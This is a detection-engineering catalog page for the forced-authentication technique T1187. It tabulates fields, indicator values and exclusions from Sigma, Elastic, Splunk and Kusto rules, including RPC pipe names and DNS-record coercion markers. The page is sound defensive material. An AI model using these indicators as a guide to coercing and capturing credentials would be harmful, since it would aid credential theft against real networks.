Forced Authentication T1187

Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.

Events covered

15 catalog events are tagged with this technique by at least one rule.

Authoring guide

Patterns shared across the 21 rules above: which fields they filter on, what specific values they look for, and what they exclude. The catalog normalizes field names across vendors so Sigma's Image, Elastic's process.name, and Splunk's process_name collapse into one row. Each rule contributes at most once per row.

Fields filtered most (33 distinct)

The fields most rules look at when detecting this technique. The How column shows the operators authors use (eq, wildcard, regex_match, match) and how often each appears. Sample values are concrete examples to start from, not an exhaustive list.

FieldRulesHowSample values
src_ip5ne 4, eq 1::1, 127.0.0.1, ::
CommandLine4contains 4, regex_match 1(?i)\s(-u|--user)\s*:, --ntlm, 1uwhrca, aaaaa, baaaa
user4ends_with 4, ne 1$
AuthenticationPackageName3eq 3NTLM, Kerberos
Channel3eq 3, in 3
EventID3eq 35136, 5137, 4662, 5145
Image3ends_with 3\7z.exe, \curl.exe, \explorer.exe, \snippingtool.exe, \winrar.exe
LogonType3eq 3Network
eventtype3eq 3
AdditionalInfo2contains 1, wildcard 1*UWhRC*BAAAA*MicrosoftDNS*, 1uwhrca, aaaaa, ybaaaa
ObjectClass2eq 2dnsNode
ObjectDN2contains 1, wildcard 1*UWhRC*BAAAA*MicrosoftDNS*, 1uwhrca, aaaaa, ybaaaa
RelativeTargetName2eq 2lsarpc
SubjectUserName2eq 2ANONYMOUS LOGON
TargetFilename2ends_with 1, in 1*\\desktop\\*, *\\documents\\*, *\\downloads\\*, .library-ms

Top indicator values (87 distinct)

Specific (field, operator, value) combinations the rules check for, ranked by how many rules under this technique use each one. The Corpus reach column counts how many rules across the entire catalog (any technique) check the same combination. High numbers point to widely-used indicators that are likely noisy on their own; combine them with another condition for useful signal. Blank means the combination is specific to rules under this technique. Click a value to expand the rules under this technique that use it.

FieldKindValueRules (here)Corpus reach
src_ipne
127.0.0.1
421
src_ipne
::1
421
userends_with
$
45
LogonTypeeq
Network
339
AuthenticationPackageNameeq
NTLM
29
EventIDeq
5136
229
EventIDeq
5137
25
ObjectClasseq
dnsNode
25
RelativeTargetNameeq
lsarpc
24
SubjectUserNameeq
ANONYMOUS LOGON
23
computer_namestarts_with
substring(user.name, 0, -1)
22
file.nameeq
FssagentRpc
22
file.nameeq
Spoolss
22
file.nameeq
WinsPipe
22
file.nameeq
dhcpserver
22
file.nameeq
dnsserver
22
file.nameeq
efsrpc
22
file.nameeq
eventlog
22
file.nameeq
lsarpc
22
file.nameeq
lsass
22
file.nameeq
netdfs
22
file.nameeq
netlogon
22
file.nameeq
samr
22
file.nameeq
srvsvc
22
file.nameeq
winreg
22
AdditionalInfocontains
1uwhrca
1
AdditionalInfocontains
aaaaa
1
AdditionalInfocontains
ybaaaa
1
AdditionalInfowildcard
*UWhRC*BAAAA*MicrosoftDNS*
1
AttributeLDAPDisplayNameeq
dnstombstoned
1

Exclusions (4 distinct)

Field/operator/value combinations excluded by rules under this technique (top-level not() clauses), sorted by how many rules exclude each. These are the false-positive paths the community has learned to filter out. A new rule that ignores the high-count entries here will likely fire on the same noisy paths. Click a value to expand the rules under this technique that exclude it.

Rules under this technique

Every rule in the catalog tagged with this technique, grouped by vendor. Click a rule title for its full predicates, exclusions, and indicators.

Sigma 7 rules

Elastic 7 rules

Splunk 6 rules

Kusto 1 rule